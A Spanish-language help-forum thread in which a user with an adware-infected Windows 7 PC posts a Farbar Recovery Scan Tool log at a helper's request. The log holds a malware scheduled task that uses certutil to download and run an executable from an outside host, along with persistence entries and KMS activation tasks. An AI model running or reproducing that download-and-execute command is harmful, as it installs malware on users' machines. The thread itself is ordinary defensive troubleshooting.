PC lenta y ventanas emergentes

Marco · 26 Marzo, 2020 19:49

Hola!

El día de hoy empecé a tener algunos problemas con mi pc, uno de ellos es que tarda mucho en iniciarse en modo normal ademas de que no me aparece el icono de Windows sino simplemente una barra cargándose hasta que me aparece la ventana normal para poner mi usuario y contraseña como normalmente lo hago.

Otro problema que tengo es con los navegadores, en Firefox me aparece una ventana con la dirección file:///C:/ProgramData/Snorlers/snp.sc y posteriormente se me abre la pagina de inicio https://search.safefinder.com/?st=sc&q=; la cual no la asigné yo ademas de que cuando me encuentro utilizando este navegador se me abren automáticamente paginas de publicidad en las que en algunos casos me solicita agregar un complemento para Firefox. En Chrome me sucede algo similar ademas de que se ha cambiado automáticamente la configuración que yo tenia para este navegador.

En la lista de programas instalados en mi pc apareció un programa llamado CloudNet el cual he intentado desinstalar pero no he podido ya que me aparece una ventana en negro con muchos signos “?” y el numero 28530 ademas de que no me da la opción para desinstalarlo.

Tengo instalada la versión Free de MalwareBytes e intenté abrirla pero no me lo permite ni en modo normal ni en modo seguro.

Debo comentar que mi sistema operativo es Windows 7 de 64 bits.

Espero que me puedan ayudar a solucionar mi problema, de antemano agradezco su ayuda.

Saludos.

JavierHF · 26 Marzo, 2020 20:07

Hola @Marco y Bienvenido al nuevo Foro…!!

Realiza estos pasos :

Desactiva temporalmente el Antivirus Cómo deshabilitar temporalmente su Antivirus, mientras estemos realizando TODOS los pasos.

Descargar en TU ESCRITORIO(y NO en otro lugar )

Farbar Recovery Scan Tool. seleccionando la versión adecuada para la arquitectura(32 o 64bits) de tu equipo. Como saber si Mi Windows es de 32 o 64 Bits ?.

Farbar Recovery Scan Tool.-

Ejecuta FRST.exe.
En el mensaje de la ventana del Disclaimer o Responsabilidad, pulsamos Yes/Si
En la ventana principal pulsamos en el botón Analizar/Scan y esperamos a que concluya el proceso.
Se abrirán dos(2) archivos(Logs), Frst.txt y Addition.txt, estos quedaran grabados en el escritorio.

Poner los dos informes en tu próxima respuesta.

Debes copiarlos y pegarlos con todo su contenido y usaras varios mensajes si recibes un mensaje de error indicando que es muy largo(mas de 50.000 caracteres aprox.).

Saludos, Javier.

Marco · 26 Marzo, 2020 21:07

Hola Javier!

Muchas gracias por tu ayuda, a continuación te envío los 2 reportes que me solicitaste.

Resultado del análisis realizado por Farbar Recovery Scan Tool (FRST) (x64) Versión: 26-03-2020
Ejecutado por MARCO AVILA (administrador) sobre MAAH-PC (Acer Aspire 4810T) (26-03-2020 14:26:41)
Ejecutado desde C:\Users\MARCO AVILA\Desktop
Perfiles cargados: MARCO AVILA (Perfiles disponibles: MARCO AVILA & Administrador)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Idioma: Español (España, internacional)
Internet Explorer Versión 11 (Navegador predeterminado: FF)
Modo de Inicio: Normal
Tutorial para Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Procesos (Lista blanca) =================

(Si una entrada es incluida en el fixlist, el proceso será cerrado. El archivo no será movido.)

( ) [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\is-LRH00.tmp\MouliaLeFil.exe
() [Archivo no firmado] C:\ProgramData\Logic Cramble\set.exe
() [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\is-26H2V.tmp\MouliaLeFil.tmp
() [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Helper.exe
() [Archivo no firmado] C:\Windows\[email protected]
() [Archivo no firmado] C:\Windows\[email protected]
() [Archivo no firmado] C:\Windows\PLFSetI.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files (x86)\Acer\Registration\GregHSRW.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Optical Drive Power Management\ODDPWR.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Optical Drive Power Management\ODDPWRSvc.exe
(Acer Incorporated -> Acer) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
(Acer Incorporated) [Archivo no firmado] C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
(Acer Incorporated) [Archivo no firmado] C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
(Acresso Software Inc. -> Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
(Clarus, Inc.) [Archivo no firmado] C:\Program Files (x86)\Clarus\Samsung Auto Backup\ISFRealTimeD.exe
(Clarus, Inc.) [Archivo no firmado] C:\Program Files (x86)\Clarus\Samsung Auto Backup\ISFTimerD.exe
(Dritek System Inc. -> Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(Dritek System Inc. -> Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe
(EGIS TECHNOLOGY INC. -> Egis Technology Inc.) C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\MWLService.exe
(Fine Point Technologies, Inc.) [Archivo no firmado] C:\Program Files (x86)\Asistente Infinitum\IsaMonitor.exe
(Ggmyhirjho) [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\~atmp\_8451.exe
(Hewlett-Packard Company -> Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuSchd2.exe
(InstallShield Software Corporation) [Archivo no firmado] C:\Program Files (x86)\Common Files\InstallShield\UpdateService\issch.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\MDM.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\msftesql.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\attrib.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\secinit.exe
(Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(NewTech Infosystems, Inc -> NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
(NewTech Infosystems, Inc -> NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(NewTech Infosystems, Inc -> NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\SchedulerSvc.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Rfz) [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\~atmp\_9D4F.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(Softdeluxe Ltd. -> FreeDownloadManager.org) C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\winwfpmonitor.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Tonec Inc. -> Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
(Ulead Systems, Inc.) [Archivo no firmado] C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
(Wondershare Technology Co.,Ltd -> Wondershare) C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe

==================== Registro (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)

HKLM\...\Run: [IAAnotif] => C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe [186904 2009-06-04] (Intel Corporation -> Intel Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [8060960 2009-08-05] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [PLFSetI] => C:\Windows\PLFSetI.exe [200704 2009-12-01] () [Archivo no firmado]
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2009-10-02] (Acer Incorporated -> Acer Incorporated)
HKLM\...\Run: [ODDPwr] => C:\Program Files\Acer\Optical Drive Power Management\ODDPwr.exe [221728 2009-09-04] (Acer Incorporated -> Acer Incorporated)
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [159232 2009-09-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe [380928 2009-09-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe [358912 2009-09-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [1808168 2009-06-18] (Synaptics Incorporated -> Synaptics Incorporated)
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [261888 2009-09-24] (NewTech Infosystems, Inc -> NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [1094736 2009-11-01] (Dritek System Inc. -> Dritek System Inc.)
HKLM-x32\...\Run: [ISUSScheduler] => C:\Program Files (x86)\Common Files\InstallShield\UpdateService\issch.exe [81920 2005-02-16] (InstallShield Software Corporation) [Archivo no firmado]
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard Company -> Hewlett-Packard)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59240 2011-09-27] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare)
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Software Inc. -> Acresso Corporation)
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [Chromium] => "c:\users\marco avila\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory=Default --restore-last-session
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [rm] => C:\Users\MARCO AVILA\AppData\Local\Temp\~atmp\_8451.exe [3244032 2020-03-26] (Ggmyhirjho) [Archivo no firmado] <==== ATENCIÓN
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [FloralShape] => C:\Windows\rss\csrss.exe [3965952 2020-03-26] () [Archivo no firmado] <==== ATENCIÓN
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [2301610] => C:\Users\MARCO AVILA\AppData\Local\Temp\is-LRH00.tmp\MouliaLeFil.exe [780875 2020-03-26] ( ) [Archivo no firmado] <==== ATENCIÓN
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [CloudNet] => C:\Users\MARCO AVILA\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2020-03-26] (EpicNet Inc.) [Archivo no firmado] <==== 

ATENCIÓN
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Winlogon: [Shell] explorer.exe, "C:\ProgramData\ErrorResponder\errorResponder.exe" <==== ATENCIÓN
HKLM\Software\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{73FA19D0-2D75-11D2-995D-00C04F98BBC9}] -> 
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\80.0.3987.149\Installer\chrmstp.exe [2020-03-19] 

(Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2011-03-28] (Microsoft Corporation 

-> Microsoft Corp.)
IFEO\OSPPSVC.EXE: [Debugger] [email protected]
IFEO\SppSvc.exe: [Debugger] [email protected]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer VCM.lnk [2009-12-01]
ShortcutTarget: Acer VCM.lnk -> C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe (Acer Incorporated) [Archivo no firmado]
Startup: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Samsung Auto Backup Real-Time Daemon.lnk [2011-02-20]
ShortcutTarget: Samsung Auto Backup Real-Time Daemon.lnk -> C:\Program Files (x86)\Clarus\Samsung Auto Backup\ISFRealTimeD.exe (Clarus, Inc.) [Archivo no firmado]
Startup: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Samsung Auto Backup Scheduler.lnk [2011-02-20]
ShortcutTarget: Samsung Auto Backup Scheduler.lnk -> C:\Program Files (x86)\Clarus\Samsung Auto Backup\ISFTimerD.exe (Clarus, Inc.) [Archivo no firmado]
BootExecute: autocheck autochk * bootdelete
GroupPolicy: Restricción ? <==== ATENCIÓN

==================== Tareas programadas (Lista blanca) ============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

Task: {004429EA-5244-4EBD-8904-9A0C64418CB1} - System32\Tasks\{E42A772A-328E-4927-BE90-5CCB2A81671D} => C:\Program Files (x86)\RAR Password Cracker\rpc.exe
Task: {044F4A48-321A-43AC-A9F6-F19F8D91B966} - System32\Tasks\Adobe Flash sdk Files Update up_2020326 => C:\Users\MARCO AVILA\AppData\Local\Temp\~atmp\_9D4F.exe [3279360 2020-03-26] (Rfz) [Archivo no firmado] 

<==== ATENCIÓN
Task: {0914E1B1-22EB-4FEB-8194-425AA2933CBD} - System32\Tasks\{C7F81ED6-E5AB-4DE6-A61C-1C27DBDDC7F1} => C:\Windows\system32\pcalua.exe -a "C:\Users\MARCO AVILA\Desktop\driver_Win7_OLOSTD130-T

\Setup.exe" -d "C:\Users\MARCO AVILA\Desktop\driver_Win7_OLOSTD130-T"
Task: {0CE184F9-C9A3-4546-9EDC-E5C5536E1418} - System32\Tasks\{3677C5C1-371D-4C65-8D9F-49AA4F00395C} => C:\Users\MARCO AVILA\Desktop\MICROSOFT PROJECT 2007 (PORTABLE)\WINPROJ.EXE
Task: {0D42BDA2-8B8C-4481-A692-92E37D95D75F} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> 

Microsoft Corporation)
Task: {12AFE1A3-4413-46CF-91D7-57ED665810D6} - System32\Tasks\{24DB5AEF-77D6-4D21-A60D-FC51D1DE0800} => F:\DERIVE\Setup.exe
Task: {13693098-6F67-419B-B05D-CFB3FE93C43E} - System32\Tasks\{42B0B5F8-0992-46F6-B000-D55521296966} => C:\Program Files (x86)\DVDVideoSoft\Free Studio\Free Video Dub\FreeVideoDub.exe [1430168 2012-02-22] 

(DVDVideoSoft Ltd. -> DVDVideoSoft Ltd.) [Archivo no firmado]
Task: {1D6C3AD0-820D-4CF9-BF65-62DD5CC0D487} - System32\Tasks\{CE0061C3-BB4E-4F9D-AE54-4C440ACD7DCB} => F:\soft\Setup.exe
Task: {2039C8D7-5F63-4C20-979C-C67488199856} - System32\Tasks\{A75F7D66-592A-4D97-ABFC-86C0BECA5C74} => F:\soft\Setup.exe
Task: {239BEED9-169D-4095-B05B-F49FF381B453} - System32\Tasks\{2B17A2B9-CF03-415D-BC43-221C4C331B14} => C:\Users\MARCO AVILA\Desktop\UVCDriver-V2.5-for web-x86&x64-20100611\setup.exe
Task: {28324B50-233C-4D3B-9B94-B5A7A3162929} - System32\Tasks\{DE9A6B33-FA22-416A-A54F-A84670A2D085} => F:\driver\setup.exe
Task: {2AB8537C-159B-455D-9813-C7CB0BC69A90} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxps://promusic.website/app/app.exe C:\Users\MARCO AVILA\AppData\Local\Temp\csrss

\scheduled.exe && C:\Users\MARCO AVILA\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATENCIÓN
Task: {2E8ED139-72E6-483B-B20C-453CEF07EAC4} - \cfozyfozh -> Ningún archivo <==== ATENCIÓN
Task: {33E26D4E-53A5-4732-9AB1-5C72A6706A0B} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [608384 2019-10-15] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {4019DA72-1B00-4FAD-8052-F0518E2C1509} - System32\Tasks\{31B64B79-FB77-4D0C-9E0A-E7C533D051B9} => C:\Windows\system32\pcalua.exe -a "C:\Users\MARCO AVILA\Desktop\Movie Maker 2.1.1 Es

\MovieMaker2.1.1.exe" -d "C:\Users\MARCO AVILA\Desktop\Movie Maker 2.1.1 Es"
Task: {45BDE75E-7158-40F8-BE0E-4EDAA215FCBF} - System32\Tasks\FreeDownloadManagerNetworkMonitor => C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\winwfpmonitor.exe [895688 2017-07-26] 

(Softdeluxe Ltd. -> FreeDownloadManager.org)
Task: {4692B3B5-1754-4087-8BB4-F28C35B8DB70} - System32\Tasks\{4DE22ECF-13B1-486E-A4BF-8E1A61B22195} => F:\DERIVE\Setup.exe
Task: {48185BB3-FC80-4AC8-82B8-38BFFAE0455F} - System32\Tasks\{025EAD11-7928-4F28-8569-C009EE9DCFED} => C:\Windows\system32\pcalua.exe -a "C:\Users\MARCO AVILA\Desktop\Nueva carpeta

\LAN_Atheros_v1.0.0.10_Win7x86x64\setup.exe" -d "C:\Users\MARCO AVILA\Desktop\Nueva carpeta\LAN_Atheros_v1.0.0.10_Win7x86x64"
Task: {4C1B364A-AEB9-4F3A-82D7-9451A6296477} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [18458752 2019-10-15] (Piriform Software Ltd -> Piriform Ltd)
Task: {4CC75682-B56F-44A7-BB3A-701756EB412D} - System32\Tasks\Erocketing Disk Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Erocketing Disk Software\Erocketing Disk Software.dll",yCieHAfJDmzQ 

<==== ATENCIÓN
Task: {4FE45DF9-137F-4313-ADC2-C643B9F07A48} - System32\Tasks\{63606048-94AF-4BF5-8844-18B2029713AE} => F:\driver\setup.exe
Task: {58A086E0-42EF-44B5-BD5E-4845892442E1} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe
Task: {5C5F48DD-AAC1-4A2B-826F-9791035D4DC1} - System32\Tasks\{76188DFE-44A0-4E86-B159-FCBB9C714646} => C:\Windows\system32\pcalua.exe -a "C:\Users\MARCO AVILA\Desktop\ADOBE PHOTOSHOP CS4 

(PORTABLE)\PhotoshopPortable.exe" -d "C:\Users\MARCO AVILA\Desktop\ADOBE PHOTOSHOP CS4 (PORTABLE)"
Task: {629B73C5-E911-4CC8-B4EE-1269D96C4357} - System32\Tasks\AutoKMSDaily => C:\Windows\AutoKMS.exe
Task: {65927409-4FCF-45C9-8D28-8617582F8DC1} - System32\Tasks\{37C356D6-A910-448F-B5DD-7BB89821D0AD} => C:\Users\MARCO AVILA\Desktop\MICROSOFT PROJECT 2007 (PORTABLE)\WINPROJ.EXE
Task: {674E4BF1-02A9-436F-A485-7B769400D288} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> 

Microsoft Corporation)
Task: {69A5FF54-77C5-426F-ACF5-015F5A789300} - System32\Tasks\{C0B8A7A4-2234-4D94-ABDC-8D51C0DF69C0} => C:\Program Files (x86)\Common Files\DVDVideoSoft\FreeStudioManager.exe [6424120 2012-02-22] 

(DVDVideoSoft Ltd. -> DvdVideoSoft Ltd. ) [Archivo no firmado]
Task: {721A677F-BD8C-4516-AFF3-3E6E2F7092D6} - System32\Tasks\R@1n-KMS\Office16ProPlus => wmic path OfficeSoftwareProtectionProduct where (ID="d450596f-894d-49e0-966a-fd39ed4c4c64") call Activate
Task: {74CABDCB-9BD1-4670-B1C3-D6D9B16E5E06} - System32\Tasks\{F0BF1A23-AAD0-476B-B0AA-DB333FC92FFE} => C:\Program Files (x86)\USB2.0 PC Camera\CamApp.exe
Task: {7D310AAB-358D-447D-BDBB-005B3CD5F610} - System32\Tasks\Product Updater => C:\Program Files (x86)\Freemore Video to GIF Converter\FFProductUpdater.exe
Task: {7E78E065-237E-4109-BA80-217925760F0B} - System32\Tasks\{362B582C-452B-4BCE-9FDA-E3F3F8988AD7} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information

\{F3D5ECF7-7AE4-4B53-8A7E-1F850D6AE6B4}\setup.exe" -c -runfromtemp -l0x0009 -removeonly
Task: {8017E0F0-4623-4CAE-BBF8-A7FB06EA6C96} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate
Task: {8017E0F0-4623-4CAE-BBF8-A7FB06EA6C96} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(2): %windir%\system32\rundll32.exe -> invagent.dll,RunUpdate
Task: {8236BBBF-4E5C-4DC9-93BE-B7DDF95B8A52} - System32\Tasks\{1009BAC7-3A0A-4541-BD6F-681906513587} => C:\Users\MARCO AVILA\Desktop\Autocad 2011 (32bits)\Setup.exe
Task: {8247DF90-7C32-494A-B60B-9F24F1954183} - System32\Tasks\{1D9CB6C2-F9B3-41AE-B8EB-6EFB93E52C1A} => C:\Program Files (x86)\HTTPDebuggerPro\HTTPDebuggerUI.exe
Task: {8504F7E2-D1B2-4255-BDFC-71978BC3D2BD} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-12-27] (Google Inc -> Google Inc.)
Task: {8736786B-E568-46C9-8E25-B1FA90D746B9} - System32\Tasks\{2764DDF7-A8C2-4955-BB01-5162F65D6B11} => F:\DERIVE\Setup.exe
Task: {8B9CDFF2-ADD7-4844-9E21-432EE136C396} - System32\Tasks\{632ACBA7-5CBB-4A11-8140-A3E251857ACB} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Electronic Arts\Need for Speed Carbono

\EAUninstall.exe"
Task: {8F9F0FAB-D1E7-494A-80BE-2F4B25FD6ACA} - System32\Tasks\{DFB5321F-790B-449D-A375-ED2396BB0BA7} => C:\Users\MARCO AVILA\Desktop\Free Video Dub 1.74.67_Portable\Free Video Dub.exe
Task: {90434769-8FF1-47DF-930F-CDC79DA03150} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate 

-nolegacy
Task: {90434769-8FF1-47DF-930F-CDC79DA03150} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(2): %windir%\system32\rundll32.exe -> 

appraiser.dll,DoScheduledTelemetryRun
Task: {9082DDA6-859B-4932-93AC-BF5642AB6B3F} - System32\Tasks\{0394875D-2637-469D-9971-0B2FC6300FA0} => F:\DERIVE\Setup.exe
Task: {968BD611-9D62-4C37-B71A-BA21308BDE53} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3965952 2020-03-26] () [Archivo no firmado] <==== ATENCIÓN
Task: {9A07DFF4-A42D-4948-B3FA-A7C3A68E7E98} - System32\Tasks\{B04818A1-4C6F-4BD3-B98B-5C67A017F2F1} => C:\Users\MARCO AVILA\Desktop\Free Video Dub 1.74.67_Portable\Free Video Dub.exe
Task: {A19BCAF8-246C-4F2A-AC23-4A816DEDFE85} - System32\Tasks\Microsoft\Windows\Time Synchronization\ViewUtcTime => C:\Users\MARCO AVILA\AppData\Roaming\\timerutc\\utct.exe [67584 2017-03-17] () [Archivo no 

firmado]
Task: {A595D2D3-1731-4800-A267-E134D77EE33D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-12-27] (Google Inc -> Google Inc.)
Task: {A764EF5F-64B9-462D-A1E2-4859F0E01865} - System32\Tasks\{F3C2F9CF-6BD4-4E8D-A408-E8C4ED283735} => C:\Windows\system32\pcalua.exe -a C:\Windows\unvise32qt.exe -c C:\Windows\system32\QuickTime

\Uninstall.log
Task: {BA81CED1-BD06-47C7-9499-6FFEEEB126E2} - System32\Tasks\{7F1A3294-4CFB-49BB-B5A4-5B003C204FE8} => C:\Program Files (x86)\HTTPDebuggerPro\HTTPDebuggerUI.exe
Task: {BCBC6656-A8B4-4C55-ADE0-4685D48896C8} - System32\Tasks\{A29A3ABC-F9AF-40F0-BE92-C29D4288F38F} => C:\Program Files (x86)\TubeDigger\TubeDigger.exe
Task: {BD144ED7-700F-4835-9680-928B99A7387B} - System32\Tasks\{EB168395-2BF7-4FA0-A39B-4D3FC10D0E6E} => F:\driver\setup.exe
Task: {C044705F-5982-492D-8273-246A395D7060} - System32\Tasks\{43D3B180-FDF4-4F21-B348-8DC9469A320D} => C:\Program Files (x86)\Common Files\DVDVideoSoft\FreeStudioManager.exe [6424120 2012-02-22] 

(DVDVideoSoft Ltd. -> DvdVideoSoft Ltd. ) [Archivo no firmado]
Task: {C0DBCC98-BB2A-447E-8147-5E4759E9D96D} - System32\Tasks\System\SystemCheck => C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Helper.exe [6979584 2020-03-25] () [Archivo no firmado] <==== 

ATENCIÓN
Task: {C680F459-75EB-4FB7-AA17-7797EB0915E4} - System32\Tasks\{F0737E83-4EB2-4475-B6D0-3055061A38A1} => F:\DERIVE\Setup.exe
Task: {C8BF051C-D43A-4939-9FF4-D25C9BECFD83} - System32\Tasks\RealUpgradeLogonTaskS-1-5-21-1649130365-987012723-906343211-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe
Task: {DBB0A5E7-0BC0-4069-BA6A-C18F6DE2AB8F} - System32\Tasks\{1BBE0B68-556F-4A59-9423-95B718E85946} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\Nero\Nero ProductInstaller 

4\SetupX.exe" -c REMOVESERIALNUMBER="9M03-01A1-PCX7-K31A-8A94-98PT-KT2E-522A"
Task: {DC572F9E-E54E-411E-8140-DA92E12273D4} - System32\Tasks\Uninstaller_SkipUac_MARCO_AVILA => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe
